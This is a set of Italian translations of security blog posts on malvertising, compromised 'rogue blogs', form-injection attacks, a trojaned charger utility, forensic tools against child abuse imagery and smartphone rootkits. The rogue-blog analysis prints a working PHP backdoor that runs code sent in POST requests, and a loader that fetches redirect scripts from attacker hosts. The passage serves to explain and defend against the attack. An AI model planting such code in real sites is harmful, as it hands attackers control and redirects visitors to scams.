Leonardo Musumeci

Il post seguente è stato tradotto, previa autorizzazione, da Graham Cluley’s blog

I giocatori di Farm Town devono stare in guardia da alcune inserzioni dannose che, mostrando falsi avvisi di sicurezza, tentano d’ingannare gli ignari utenti allo scopo d’installare codice dannoso, o consegnare i dati delle carte di credito.

SlashKey, gli sviluppatori del gioco, con oltre 9,6 milioni di utenti mensili attivi su Facebook hanno pubblicato un avviso sul proprio forum, consigliando ai giocatori di diffidare di avvisi che compaiono improvvisamente e avvertono che il computer è infetto:

Se improvvisamente appare un avviso che il computer è stato infettato da un virus, DOVETE eseguire la scansione ora, NON FATE CLIC SUL LINK, CHIUDETE IMMEDIATAMENTE LA FINESTRA . Fate una scansione completa con il programma antivirus per garantire che tutte le parti di questo malware siano state identificate e messe in quarantena.

Se fate una ricerca su molti di questi programmi spyware, troverete anche una miriade di siti che si vantano d'essere gli unici in grado di liberarsi di questi programmi. Non è vero e personalmente vi esorto a usare molta cautela, perché alcune di queste cosiddette cure meraviglia non sono altro che scam, come il malware che si sta tentando di rimuovere.

Centinaia di giocatori di Farm Town hanno risposto sul forum dicendo di essere dalla parte di chi ha subito l’attacco. Ma la principale preoccupazione è che molti utenti potrebbero non aver notato l’avviso, avrebbero potuto essere ingannati dai falsi avvisi antivirus e aver infettato i propri computer, o aver consegnato dati personali.

Sembra che il problema sia legato alla pubblicità di terze parti che Farm Town visualizza sotto la finestra di gioco. Con ogni probabilità gli hacker sono riusciti a contaminare alcune delle inserzioni dirette a Farm Town dal fornitore di pubblicità esterno.

Tale pubblicità dannosa (nota anche come malvertising ) è stato il vettore di altre infezioni in passato, compresi gli attacchi contro i lettori del New York Times e Gizmodo .

Ciò che rende questo attacco tanto più grave, naturalmente, è il gran numero di persone che giocano regolarmente a Farm Town e che, con tutta probabilità, potrebbero non essere tech-savvy come il tipico lettore di Gizmodo e quindi più vulnerabili a cadere vittime degli scam compiuti dagli hacker. Piuttosto che Slashkey chieda semplicemente ai lettori di segnalare le inserzioni sospette, potrebbe essere opportuno per l’azienda disabilitare gli annunci di terze parti presenti accanto a Farm Town, fino a quando il problema verrà risolto.

Potrebbe non essere colpa di Farm Town se una rete di inserzioni di terze parti utilizza ad dannosi, ma fare poco sicuramente mostra un disprezzo incurante della sicurezza dei propri giocatori.

Finché i creatori di Farm Town risolveranno il problema delle inserzioni dannose, il mio consiglio ai suoi tifosi è di smettere di giocare e assicurarsi che il computer sia adeguatamente protetto con software aggiornato. Se sentite di dover giocare a Farm Town, può essere saggio disabilitare nel proprio browser le inserzioni (ad esempio, utilizzando un estensione come Adblock Plus su Firefox).

A proposito, se siete su Facebook e volete essere informati sulle ultime notizie in merito alla sicurezza, diventate Fan di Sophos .

Fonte: Farm Town virus warning: Malvertising at work?

Il post seguente è stato tradotto, previa autorizzazione, dal blog Schneier on Security

Una nuova forensic potenziale:

Per determinare quanto siano simili i batteri presenti sui polpastrelli di una persona con quelli sui tasti di un computer, il team ha preso i tamponi di tre tastiere e confrontato le sequenze di geni batterici con quelle dei polpastrelli dei proprietari della tastiera. Oggi, nei Proceedings of the National Academy of Sciences, si è giunti alla conclusione che anche i pochi batteri raccolti da piccole superfici quali i tasti di un computer, sono sufficienti per collegarli alla mano che li ha depositati.

I ricercatori hanno testato, successivamente, con quale precisione questa tecnica possa identificare la persona che ha lasciato i batteri dalla popolazione comune. Sono stati campionati batteri provenienti da nove mouse e dai nove proprietari dei mouse. Sono state raccolte informazioni anche sulle comunità batteriche di 270 mani che non avevano mai toccato i mouse. In tutti i nove casi, i batteri sui mouse sono stati molto più simili alle mani dei proprietari dei mouse, che non a quelle delle 270 mani estranee. I ricercatori hanno scoperto anche che i batteri rimangono sul tasto, o sul mouse di un computer fino a 2 settimane dopo essere stati toccati.

Ecco un link per l’abstract, il documento completo è protetto da un paywall.

Fonte: Identifying People by their Bacteria

Il post seguente è stato tradotto, previa autorizzazione, dal blog Unmask Parasites. Blog.

A novembre, ho scritto in merito ai rogue blog , creati nelle sottodirectory di siti legittimi. I blog contaminavano i risultati delle ricerche di Google per milioni di parole chiave relativamente poco comuni (the long tail), reindirizzando i visitatori a siti web scareware.

Questo hack principalmente interessava i siti ospitati sul network Servage .

Recentemente sono stato contattato da uno dei clienti di Servage che ha trovato alcuni dei propri siti violati:

ho notato traffico anomalo verso domini parzialmente o interamente utilizzati per gli indirizzi email (SMTP forwarding, niente di così ‘intelligente’ con la webmail.). Questo m’ha portato ad analizzare le strutture dei file ed una rapida occhiata su Google mi ha portato al tuo sito.

Mi ha inviato il file incriminato che si trovava nel suo account (grazie Matthew). Ora posso condividere la mia analisi dei file con tutti voi.

Nel mio post precedente, ho speculato sulla struttura interna dei rogue blog. Ora che ho i file, posso dire che tutte le mie ipotesi si sono rivelate corrette.

Motore del Blog

Appunto, un motore PHP full-optional ancora minimalista potenzia i rogue blog. L’intero motore è composto di soli 4 file:

• index.php – file principale del motore. Meno di 500 righe di codice PHP. Meno di 18K byte su disco.
• template.php – template delle pagine Web che utilizza i dati forniti da index.php. Circa 20 Kbytes.
• categories.dat – categorie del blog serializzate.
• . htaccess – rewrite rules per supportare gli URL SEO friendly.

Questo motore è veramente anonimo. Non sono riuscito a trovare eventuali credits. Nessun nome, o licenza. Solo il codice. L’unico indizio che ho trovato è stata questa stringa User-Agent delle richieste ping: WeirD blog engine.

Caratteristiche

Il motore può fare tutto ciò che ci si aspetta da un motore per blog.

• aggiungere/rimuovere voci
• separare le voci per categorie
• mostrare le voci in ordine cronologico
• supporto per gli url SEO friendly
• notifica servizi come Ping-O-Matic, Technorati, Google Blogsearch, Weblogs sui nuovi post.
• feed RSS
• supporto per i trackback
• supporto per template personalizzati

File semplici

Le voci (sono centinaia) sono memorizzate in semplici file . txt nella stessa directory. Questo rende il motore indipendente dal database, in modo da poter lavorare su più server. Gli unici requisiti sono:

• PHP
• autorizzazioni per le directory sufficienti per creare file
• Apache (per usare URL SEO-friendly)

Ecco un esempio di uno di questi file di testo (blonde-avril-lavigne.txt):

blonde avril lavigne
<img src="http://lh5.ggpht.com/elaing.zhang/SNxxYg5W9iI/AAAAAAAAUzE/Y75n9lb2xmg/s800/avril-lavigne80926003.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://lh3.ggpht.com/elaing.zhang/SNxxYxT7YwI/AAAAAAAAUzM/CZ832w22_Go/s800/avril-lavigne80926004.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://images.teamsugar.com/files/users/2/20652/34_2007/76335776.preview_0.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://www.judiciaryreport.com/images/avril-lavigne-pic.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://static.desktopnexus.com/wallpapers/4138-bigthumbnail.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />

Come potete notare i file sono chiari. Al titolo della prima riga segue subito il contenuto. Nel nostro caso il contenuto è composto da cinque immagini (i risultati della ricerca su Google Immagini per le parole chiave corrispondenti ).

. htaccess

Poiché lo scopo del rogue blog è la contaminazione dei risultati di ricerca, l’ url “SEO-friendly” è una caratteristica necessaria del motore di questo blog. Questo motore utilizza rewrite rules di .htaccess.

RewriteEngine On
RewriteRule ^category/([^/\.]+)/?$ index.php?category=$1 [L]
RewriteRule ^category/([^/\.]+)/page/([0-9]+)/?$ index.php?category=$1&page=$2 [L]
RewriteRule ^download/([^/\.]+)/?$ download.php?id=$1 [L]
RewriteRule ^page/([0-9]+)/?$ index.php?page=$1 [L]
RewriteRule ^([^/\.]+)/?$ index.php?id=$1 [L]
RewriteRule ^rss20.xml$ index.php?action=rss [L]


Caratteristiche dannose

Ciò che rende questi blog dannosi sono le seguenti modifiche al motore originale.

css.js

Tutte le pagine del blog contengono il seguente tag script:

<script type="text/javascript" src="'.$blog['homepageUrl'].'css.js"></script>

Lo script reindirizza i visitatori che provengono dai motori di ricerca verso siti scareware. Il contenuto di questo script cambia in maniera costante, reindirizzando le persone verso nuovi siti, non ancora presenti nelle blacklist.

Ecco come lo fanno dietro le quinte:

function get_js_file($filename) {
if (!file_exists($filename) or time() - filemtime($filename) > 3600) {
$js_file = @file_get_contents('hxxp://t.xmlstats .in/b-m-2/'.$filename);
if (!$js_file) { $js_file = @file_get_contents('hxxp://t.jsonstats .in/b-m-2/'.$filename);}
if ($js_file) { @file_put_contents($filename, $js_file);}
}}

Come si può vedere, questo codice cerca di aggiornare il file css.js, scaricando il suo nuovo contenuto da siti hacker:

t.xmlstats. in , t.jsonstats. in e, in alcune versioni del motore, t.jsstats. in .

In questo modo gli hacker si assicurano che i loro blog reindirizzino sempre verso siti scareware perfettamente funzionanti.

Anti-Googlebot

Un’altra modifica è rappresentata dal codice che individua le richieste provenienti dal network di Google, verificando l’indirizzo IP tra gli intervalli noti.

Se viene rilevata una richiesta da parte di Google, il file css.js viene sostituito con css.google.js .
In questo modo gli hacker cercano di nascondere i reindirizzamenti dannosi dal Googlebot quando indicizza i rogue blog.

Se molti blog simili compaiono nei risultati di ricerca di Google senza nessuna segnalazione, significa che questo semplice trucco fa bene il proprio lavoro.

Diverse generazioni

In novembre ho scoperto che c’erano state molte generazioni diverse di rogue blog. Controllando i file ricevuti da Matthew, ho trovato quelle generazioni in sottodirectory separate: blog, bmblog, bmsblog.

Script backdoor

Un altro file interessante che ho ricevuto è stato index.php, che precedeva le directory con i rogue blog:

<?php
error_reporting(E_ALL);
if (md5($_POST['5758e26e']) == '068f4646e8e1aefcdcd184e31e33af47') {
$test_func = create_function('', urldecode($_POST['f']));
$test_func();
}
?>

Questo è un tipico script backdoor che esegue qualunque codice PHP che gli hacker scelgano d’inviare nei parametri delle richieste POST.

Apparentemente questo script è stato utilizzato per creare tutti gli altri file e directory rogue. La questione è come mai questo script backdoor sia arrivato qui, al primo posto.

Quando Matthew ha chiesto a Servage cosa stesse accadendo ai suoi siti, lo hanno accusato di utilizzare script poco sicuri, nonostante il il fatto che il suo sito non utilizzasse nessun script.

Come ho mostrato nel mio post precedente , oltre l’85% dei blog rogue scoperti, sono ospitati da Servage; quindi sono quasi certo che sia stata utilizzata qualche vulnerabilità specifica di Servage.( Pura speculazione: ad esempio, potrebbe essere una shell php che gli hacker utilizzano per trovare account utente con directory scrivibili. E l’architettura interna di Servage potrebbe aiutare questo script a propagarsi su diversi server fisici. )

Ancora attivo

Nonostante la prima generazione di questi rogue blog sia apparsa in aprile dell’anno scorso, questo attacco è ancora attivo. Riesco ancora a vedere parecchi rogue bmsblog blog con le date dei post più recenti di marzo 2010. E alcuni di loro (non tutti comunque) possono essere trovati tramite una ricerca di Google inurl:bmsblog/category 2010.

Nonostante questo particolare attacco colpisca soprattutto i clienti della società di hosting Servage, è abbastanza tipico per questi hack tentare di creare pagine web rogue nei siti web compromessi. Quindi il seguente consiglio dovrebbe essere utile per la maggior parte dei webmaster.

1. Assicuratevi che le directory dei server siano scrivibili soltanto da voi. In particolare nel caso di un ambiente di hosting condiviso, dove gli hacker possono utilizzare un account neighbor compromesso per trovare le directory scrivibili negli altri siti sullo stesso server e creare contenuti rogue.

2. Effettuate un’analisi regolare del server alla ricerca di file e directory sospetti.

3. Controllate regolarmente i raw server log. Potreste trovare richieste di file che non dovrebbe essere presenti.

4. Prestare particolare attenzione alle richieste POST. Sono molto usate per gli script backdoor. Basta compilare un elenco di file accessibili tramite le richieste POST e verificare se ne riconoscete alcune.

5. Molti piani di hosting condiviso includono Webalizer . Ogni tanto controllate i suoi report. Nonostante non siano così utili come i rapporti di Google Analytics, hanno un vantaggio importante: tracciano tutti i file del vostro account, non solo quelli in cui è stato inserito un codice di monitoraggio. Così, in Webalizer, è possibile vedere le richieste dei file create dagli hacker, mentre in Google Analytics questo tipo di dati manca completamente .

6. Gli hacker, di solito, creano pagine web rogue per contaminare i risultati delle ricerche di Google. Quindi è naturale usare Google per rilevare questo tipo di hack. Utilizzate regolarmente Google per verificare ciò che è indicizzata sul tuo sito. Utilizzate il comando di ricerca site:you_site_domain.com

7. Controllate regolarmente i report in Strumenti per i Webmaster .
Potrebbero rivelare anche attività sospette. Report utili: Principali query di ricerca , Parole chiave , Link che rimandano al tuo sito .

8. Se trovate nuove directory con file rogue, negate loro i permessi in robots.txt .
Questo mostrerà a Google che non si desidera che queste directory vengano indicizzate. In caso contrario, anche se si elimina il file, Google può tenerli in indice per parecchio tempo (chi lo sa, forse l’avete rimosso temporaneamente mentre, per esempio, state riprogettando il sito).

Ad esempio, se trovate file pericolosi in /cgiproxy/bmsblog/ il file robots.txt deve essere:
User-agent: *
Disallow: /cgiproxy/bmsblog/

9. Non dimenticate gli altri tipi di hack che pasticciano con i file esistenti. Controllate regolarmente la coerenza del vostro sito e vigilate su qualsiasi contenuto illecito che gli hacker possano iniettare nelle pagine web ( in questo caso il mio servizio Unmask Parasites può aiutare).

Chiama per ulteriori informazioni

Questo caso non è stato ancora completamente investigato. Ad esempio, ancora non so perché colpisca soprattutto Servage e come esattamente si propaghi. Queste informazioni potrebbero esser utili ai clienti di Servage per prevenire l’infezione dei loro siti.
Probabilmente anche i ragazzi di Servage hanno bisogno di queste informazioni, visto che pare non possano fermare questo attacco da soli ( è in corso da circa un anno !!!)

Se avete informazioni interessanti su altri tipi di attacchi hacker, vi invitiamo a condividerle con me e i lettori di questo blog. Sono sempre alla ricerca di file dannosi che i webmaster trovino su server compromessi. Possono dire molto su come funzionino gli attacchi.

Quindi prima di eliminare qualsiasi contenuto pericoloso, prima di tutto contattatemi.

Grazie per aver letto questo blog. I vostri commenti sono benvenuti .

Post correlati:

• Rogue blogs regirect search traffic to bogus AV sites. Part 1
• Rogue blogs redirect search traffic to bogus AV sites. Part 2
• Bety.php – osCommerce Hack. Part 1.
• Bety.php Hack. Part 2. Black Hats in Action.

Fonte: Internals of Rogue Blogs

Il post seguente è stato tradotto, previa autorizzazione, dal blog SANS Computer Forensics

Nel corso degli ultimi anni, gli attacchi contro le applicazioni web sono diventati più frequenti e sofisticati.

Ci sono diversi metodi per attaccare le applicazioni web, SQL injection, è uno dei più noti. In questo articolo parleremo di una classe diversa di attacchi e forniremo alcuni esempi di come un incident responder, o un investigatore di computer forensics possa individuarli.

Tutti i form web contengono campi che vengono utilizzati per catturare input da un utente e inviati al server per l’elaborazione.
I campi del form vengono comunemente usati per raccogliere informazioni, dai dettagli dell’operazione sui siti di ecommerce, fino alle credenziali di autenticazione per contenuti riservati. Mentre i campi del form vengono utilizzati per raccogliere dati legittimamente inseriti da parte degli utenti, possono essere utilizzati anche per arrecare danno.

Un esempio comune di attacco lato client è il form field injection. In questo tipo di attacco il malware, interagendo con un browser web, aggiunge ulteriori campi ad un form su una pagina web (cercate BHO html injection).

Lo scopo dei campi injected è ingannare gli utenti a rivelare dati personali sensibili, come password, codici PIN dei bancomat e numeri di carte di credito. Queste informazioni vengono acquisite e trasmesse a siti remoti dove possono essere usati per perpetrare furti di identità o frodi. Diverse classi di malware sono in grado di eseguire questo tipo di attacco, compreso l’ampiamente utilizzato ZeuS

Gli attacchi HTML injection compiono con il form field injection, un ulteriore passo in avanti. Invece di inserire un campo di un form in una pagina web, l’injection di codice HTML sostituisce l’HTML legittimo proveniente dal server, in maniera simile ad una operazione “taglia ed incolla”. L’HTML sostituito viene sovrascritto dall’ HTML dell’attacker ed il contenuto originale non verrà mai più inserito dal browser web. Questo tipo di attacco può essere utilizzato per modificare il flusso logico di un’applicazione web. Ad esempio i dati legittimi in una pagina web, come il riepilogo di un account, potrebbero essere sostituiti da un form per chiedere nome utente e password. Dopo che i dati saranno stati inseriti nel form, i dati legittimi saranno mostrati correttamente. Ciò potrebbe apparire come un ulteriore livello di autenticazione, inducendo l’utente a inserire le credenziali che verranno memorizzate come l’attacco form field injection di cui sopra.

Perché queste informazioni sono importanti per i professionisti dell’ incident response e della digital forensic ? Entrambi questi attacchi sono lato client. Quando si investiga su applicazioni web compromesse, gli investigatori potrebbero non avere accesso al computer lato client. Tuttavia, poiché i campi injected sono parte di un form web, possono essere trasmessi al server nella richiesta POST, insieme ai campi legittimi della pagina. Questi artifact possono essere visualizzati come dati anomali nei log dei server. Ad esempio, un campo nome utente che appaia in un POST che non sia in una pagina di login legittima, dovrebbe essere investigato.

In sintesi: conoscere gli attacchi in corso, saper come vengono compiuti e saper quali artifact, o firme, possano lasciarsi alle spalle, può essere un grande vantaggio per un investigatore. Tramite la conoscenza e la ricerca di questi segni, gli investigatori sono in grado di riconoscere e reagire agli incidenti più velocemente, con conseguente minore impatto per l’organizzazione/agenzia. Si torna al vecchio adagio di conoscere il vostro sistema, dati, flussi, ecc. Concentrate l’attenzione su qualsiasi deviazione anomala rispetto a questi pattern, in quanto può essere un avvertimento che si sia verificato un incidente.

Chris Silveira gestisce il CSIRT e Paul Yacovetta è un forensic engineer presso un istituto finanziario.

Fonte: Client-side Web Application Attacks

Il post seguente è stato tradotto, previa autorizzazione, da Graham Cluley’s blog

Mi pare il momento di ricordare a tutti che il malware non è qualcosa che si scarica soltanto da internet, in allegato ad un’e-mail, o in agguato su un CD. Ogni volta che si collega un dispositivo di memoria al computer, ci si sta esponendo, potenzialmente, a qualsiasi codice dannoso che potrebbe risiedere sull’unità.

Quindi bisogna essere consapevoli che tutti i tipi di oggetti possono contenere malware e potrebbero trasmetterlo al vostro computer portatile o desktop, se usati come allegati. Non importa se si tratta di un iPod , un BlackBerry , un navigatore satellitare , o una cornice fotografica digitale .

Se può memorizzare dati, può memorizzare anche malware.

L’ultimo allarme proviene dall’US-CERT, il quale comunica che il software fornito con il caricabatterie Energizer DUO USB NiMH, è stato infettato da un Trojan backdoor in grado di infettare i PC Windows.

Sophos rileva il cavallo di Troia come Troj / Bckdr-RBF .

Non è ancora noto come il software, progettato per visualizzare il livello di carica della batteria, sia stato contagiato. È chiaro, tuttavia, che una procedura più severa in merito ai controlli di qualità, avrebbe potuto salvare i computer dei consumatori e rossori ad Energizer.

Per maggiori informazioni leggete l’ advisory dell’ US -CERT .

Aggiornamento: Sembra che ci sia una certa confusione in merito al fatto che il caricabatterie Energizer DUO USB NiMH, venga fornito con software infetti, o se sia stato messo a disposizione da Energizer separatamente.

Il lettore del Clu-blog Kurt Wismer ( che sa una cosa o due sui malware ), dice di avere uno di questi caricabatterie Energizer e non è stato venduto con software infetto da malware .

In ogni caso, fate attenzione !

Fonte: Bad Bunny! Energizer USB battery charger blamed for backdoor

Il post seguente è stato tradotto, previa autorizzazione, da DFI News

Alcuni reati come lo stupro e la tortura di neonati e bambini, sono talmente detestabili che la reazione della maggior parte delle persone è di allontanarsi nella speranza che il problema svanisca.
Gli analisti della forensics, tuttavia, devon far fronte a questa oscura realtà nell’ottica dei procedimenti giudiziari. La portata del problema è immensa.

Internet consente l’accesso immediato alla pornografia infantile. Il National Center for Missing and Exploited Children (NCMEC) riporta di aver visionato 23 milioni d’immagini e video di pornografia infantile. 8,6 milioni soltanto nel 2008.

Con il diffondersi del problema, le vittime sembrano esser sempre più giovani. Secondo la relazione annuale dell’Internet Watch Foundation (IWF), il 69% delle vittime sono inferiori ai dieci anni e il 24% ai sei anni, o ancora più giovani. Alcuni sono bimbi molto piccoli.
Sia l’IWF che l’NCMEC sono entrambi attivi per aiutare gli analisti della forensics ad aprire nuovi casi nei confronti di coloro che producono, distribuiscono e consumano la pornografia infantile. Due nuovi strumenti software, uno sviluppato all’ Oak Ridge National Laboratory e l’altro in Svezia, sono stati distribuiti questa estate per aiutare loro ed altri soggetti coinvolti in questa attività.
Entrambi gli applicativi sono stati progettati per automatizzare alcuni dei task più grevi della forensics nella lotta contro la pornografia infantile.

Il sistema svedese, chiamato NetClean Analyze, è uno strumento di indagine per le forze dell’ordine che lavorano con immagini e video di abusi sessuali su minori.

Sviluppato per la Swedish National Police, NetClean Analyze, utilizza tecniche di riconoscimento univoco per accelerare il processo di analisi e classificazione delle immagini e dei video. Il sistema, attualmente in uso alle forze dell’ordine europee, è in grado di catalogare rapidamente centinaia di migliaia di immagini e video, che si trovano solitamente nel corso di un’indagine sui computer confiscati a sospetti trafficanti di pornografia infantile.

Prima dell’avvento di NetClean Analyze, gli analisti della forensics avrebbero dovuto visualizzare e catalogare manualmente ogni immagine o video, cosa che avrebbe rallentato notevolmente il processo d’analisi.

NetClean Analyze si concentra su tre questioni fondamentali.
Riduce il tempo che gli investigatori impiegano ad esaminare vecchie immagini o video duplicati, facilita la collaborazione tra le unità di polizia e consente un sistema di reporting più efficace, grazie ad un motore che permette la creazione di semplici report personalizzati o standardizzati.

A parte la categorizzazione automatica, NetClean isola i file duplicati, ciò consente di risparmiare tempo.

Christian Sjöberg, CEO della NetClean Technologies, di Göteborg, Svezia ha detto che “non è insolito che i duplicati riducano il numero di immagini in un caso, a volte da 350.000 a 80.000, risparmiando un’enorme quantità di tempo necessario all’analisi”

Il sistema può anche trovare immagini simili ad una determinata immagine.

Sjöberg ha detto anche “dal momento che le immagini di abusi su minori sono generalmente in serie, se si seleziona un’immagine e si chiede al sistema di mostrare immagini simili, si troverà tutta la serie relativa alla prima immagine in un clic”. “Questo è utile agli investigatori quando sono incerti in merito ad un’immagine. Possono richiedere al sistema di trovare foto simili ed alcune possono essere chiaramente abusi su minori “.
Dopo aver analizzato e catalogato tutti i file, l’investigatore potrà creare un report dettagliato a fini processuali, con allegate immagini di esempio.
Global Technology Solutions (Hollywood, Florida) detiene i diritti per il nord America per NetClean e ha messo a disposizione il sistema per le forze dell’ordine senza alcun costo, in accordo con lo sviluppatore svedese.

La prima installazione di NetClean negli Stati Uniti, è stata in settembre, in Florida, presso l’Ufficio della Broward County Sheriff’s; dove è attualmente in corso il fine tuning, grazie al lavoro sul campo.

“Successivamente lo metteremo a disposizione di altre forze dell’ordine,” ha dichiarato Chris Cavallo, presidente della Global Technology Solutions.

Ogni dipartimento di polizia interessato ad ottenere una copia del software, può contattare GTS con sede ad Hollywood, in Florida, al 954-981-2600, o attraverso il sito web della società, www.gtsna.com .

Uno dei punti di forza di NetClean, è il massiccio database centrale di materiale pedopornografico già noto, che permette in maniera molto semplice di confrontare il materiale sequestrato di recente con il database, per individuare nuove immagini o video.

Cavallo ha detto che “più agenzie utilizzeranno il sistema, più completo sarà il nostro database di immagini e ciò renderà la cattura dei pedofili e la loro incriminazione più facile”.

Oak Ridge System

L’Oak Ridge System utilizza anche un software per effettuare rapidamente e accuratamente la scansione degli hard disk dei computer sequestrati, riducendo drasticamente la quantità di tempo necessario per eseguire la scansione di un computer ed i ritardi dei backlog dell’analisi relativa alla forensics.

“Stiamo combinando i messaggi di rete con gli strumenti di analisi delle immagini, per trovare rapidamente il peggiore tra i peggiori colpevoli di pornografia infantile”, ha detto Tom Potok, dell’ ORNL Computational Science and Engineering Division.

Il peggio del peggio, in questo caso, sono i predatori deviati che stuprano, abusano sessualmente e torturano i bambini; molti dei quali sono neonati, o bimbi molto piccoli.

Potok sostiene che con il suo sistema, ancora senza nome, c’è una buona probabilità che il numero dei procedimenti giudiziari di questi delinquenti possa raddoppiare.

L’Oak Ridge System, che ha vinto l’R&D 100 award nel 2007, si differenzia da NetClean, in quanto il suo sistema funziona analizzando immagini, video e testo; mentre NetClean analizza soltanto le immagini ed i video.

“Il nostro lavoro è applicabile anche alle reti di file sharing peer-to-peer, non solamente agli hard drive”, ha sostenuto.

L’idea è che trovando testo e immagini di pornografia infantile in uno stesso computer, vi sia una maggiore probabilità di trovare qualcuno che stia abusando di bambini e che condivida immagini o video; piuttosto che, probabilmente, soltanto un consumatore dell’ignobile prodotto.

Un prototipo dell’Oak Ridge System è stato distribuito nel mese di settembre per il live beta testing alla Knoxville Internet Crimes Against Children Task Force. Un secondo prototipo è stato inoltre distribuito presso la stessa organizzazione. Il secondo, consente di identificare i bambini scomparsi confrontando le facce presenti nelle immagini di pornografia infantile, con le banche dati dei bambini scomparsi.

Google
Quando si tratta di cercare testo o immagini, nessuno è più esperto di Google, che lo scorso anno ha annunciato una partnership con NCMEC, per fornire un software progettato per automatizzare l’assistenza tecnica che NCMEC fornisce alla polizia, in merito alle indagini sulla pornografia infantile.

È l’ultima iterazione dell’offensiva del NCMEC, quella di combattere il fuoco con il fuoco.

“I criminali utilizzano una tecnologia all’avanguardia per commettere i loro crimini di sfruttamento sessuale dei bambini. Nella lotta per risolvere quei crimini e mantenere la sicurezza dei minori, dobbiamo fare la stessa cosa”, ha detto Ernie Allen, presidente e CEO di NCMEC.

Gli analisti ed il NCMEC’s Child Victim Identification Program, hanno esaminato più di 15 milioni di immagini e video di pornografia infantile, nel tentativo di individuare e salvare i bambini. Gli analisti NCMEC tipicamente analizzano qualcosa come 200.000 immagini in una settimana.
Ora, con il sistema automatico di Google, familiarmente chiamato Bedspread Detector, gli analisti NCMEC potranno con maggiore rapidità e facilità interrogare i sistemi di ricerca NCMEC, per ordinare ed identificare i file che contengono immagini di vittime della pornografia infantile.
Il sistema si chiama ‘Bedspread Detector’, perché un analista NCMEC ha notato che lo stesso copriletto era presente in numerose immagini diverse e con diverse vittime.

Allen ha detto che “è stato in grado di collegare l’abuso di due bambine, una bionda ed una bruna, perché l’autore stava abusando di loro sullo stesso particolare copriletto” .

Il sistema di Google ‘Bedspread Detector’, ora consente agli analisti di individuare caratteristiche uniche: ad esempio un copriletto particolare, una foto di sfondo, un tatuaggio, o una pianta in un vaso e successivamente cercare all’interno di un vasto database altre immagini che contengano quella particolare caratteristica.

Allen ha detto che “questo ci aiuterà a identificare sempre più vittime e a collegarle a particolari autori, perché la maggior parte di essi molestano diversi bambini”

Google incoraggia i suoi dipendenti a dedicare il 20% delle loro ore lavorative a progetti sociali. In questo caso, quattro ingegneri del software di Google, hanno trascorso un anno per sviluppare questo nuovo strumento.

I dettagli di come funzioni esattamente il sistema non sono stati divulgati, né in che modo aiuti a salvare i bambini. Ciò che NCMEC dice è che Google non soltanto favorisce l’incriminazione ma contribuisce ad identificare e salvare i bambini.
Allen ha detto che “anche se non ci saranno cambiamenti miracolosi durante la notte, la linea di fondo è che grazie a questi strumenti, stiamo facendo progressi”.

Altri Strumenti

Allen ha altre tattiche che stanno dando risultati nella campagna anti-pornografia infantile. Nel 2006, NCMEC è stata determinante nella formazione della Financial Coalition Against Child Pornography (FCACP), un’ alleanza tra l’industria del settore privato e pubblico nella battaglia alla pornografia infantile.

I consumatori di pornografia infantile una volta erano in grado di utilizzare strumenti di pagamento tradizionali, come le carte di credito, così come i nuovi sistemi di pagamento alternativi come PayPal, per l’acquisto di pornografia infantile su Internet.

La missione del FCACP è quello di seguire il flusso di fondi e chiudere i conti utilizzati da queste imprese illecite.

L’alleanza è composta da grandi banche, società di carte di credito, le reti di pagamento elettronico, le imprese di pagamento di terze parti e fornitori di servizi Internet, che rappresentano quasi il 90% dell’industria di pagamento domestico.

“Lo stiamo facendo da tre anni e abbiamo praticamente eliminato l’uso della carta di credito per acquistare l’accesso a siti di pornografia infantile”, ha detto Allen.

I gestori di questi siti sono costretti a sviluppare altri metodi di pagamento. Allen ha detto che alcuni hanno creato sistemi di pagamento propri o di terze parti. La maggior parte non accetta più carte di credito emesse dagli Stati Uniti o dal Regno Unito.

Un altro segno di progresso è rappresentato dal prezzo di questi contenuti perversi, che è drasticamente aumentato. In alcuni casi, ciò che una volta costava 29,95 $ al mese per l’accesso a un sito di pornografia infantile, ora costa da 800 a 1.000 $, secondo Allen.

Le forze dell’ordine riportano che il numero di gestori di questi siti illegali è diminuito in modo sostanziale, riducendosi a non più di una manciata; la maggior parte dei quali si ritiene siano gestiti da organizzazioni criminali dell’Est europeo.

“Abbiamo reso più costoso il business di queste persone”, ha detto Allen.
“Abbiamo aumentato il rischio. Abbiamo limitato i metodi di pagamento e praticamente interrotto l’uso di carte di credito tradizionali.”

Ma è realistico. Sa che le persone che fanno soldi dallo sfruttamento sessuale dei bambini si adatteranno.

“Troveranno altri modi di fare soldi e faremo in modo di seguire il denaro”, ha detto. “Quando svilupperanno nuovi meccanismi, cercheremo di attaccarli”.

Douglas Page, scrive di forensic science e medicina, a Pine Mountain, California. Può essere raggiunto all’indirizzo douglaspage@earthlink.net .

Fonte: To Catch a Child Predator

Il post seguente è stato tradotto, previa autorizzazione, da Graham Cluley’s blog

Liviu Iftode e Vinod Ganapathy, due ricercatori della Rutgers University, hanno rivelato alcuni esperimenti che stavano effettuando per dimostrare come i rootkit possano essere utilizzati per controllare uno smartphone.

Gli scienziati hanno dimostrato che un malintenzionato potrebbe far si che uno smartphone possa “intercettare una riunione, tenere traccia degli spostamenti del proprietario, o far scaricare rapidamente la batteria per rendere il telefono inutilizzabile”.

Guardate il video seguente su YouTube per maggiori informazioni:

È un video carino ma, in realtà, quanto è realistica questa minaccia ?

Non credo che il tipo di attacco descritto da Iftode e Ganapathy sia un grosso problema in questo momento.

Sì, è possibile modificare o mettere il software su uno smartphone (ad esempio, tramite l’installazione di un rootkit), in modo che il dispositivo mobile possa avere effetti dannosi. Per esempio, il codice che consenta il controllo remoto, l’esaurimento della batteria, o il furto silente dei dati.
Naturalmente, ciò è possibile se lo smartphone permette di apportare modifiche al suo software low-level.
Gli smartphone, come l’iPhone di Apple, bloccano in larga misura questo tipo d’intromissione.

Quindi, la cosa fondamentale da ricordare è che i bad guy devono essere in grado, in qualche modo, d’inserire il rootkit dannoso sul cellulare.

Come possono farlo?

Tramite l’accesso fisico al vostro smartphone, o tramite una vulnerabilità senza patch di sicurezza, o un attacco di ingegneria sociale per ingannarvi ed installare codice dannoso. Anche nel caso abbiano usato il metodo dell’ “inganno”, dovranno affidarsi al sistema operativo del telefono, per poter installare applicazioni non approvate (gli iPhone, ad esempio, sono strettamente controllati dai loro padroni di Cupertino, in modo da consentire agli utenti di installare solamente codice approvato e controllato dall’AppStore).

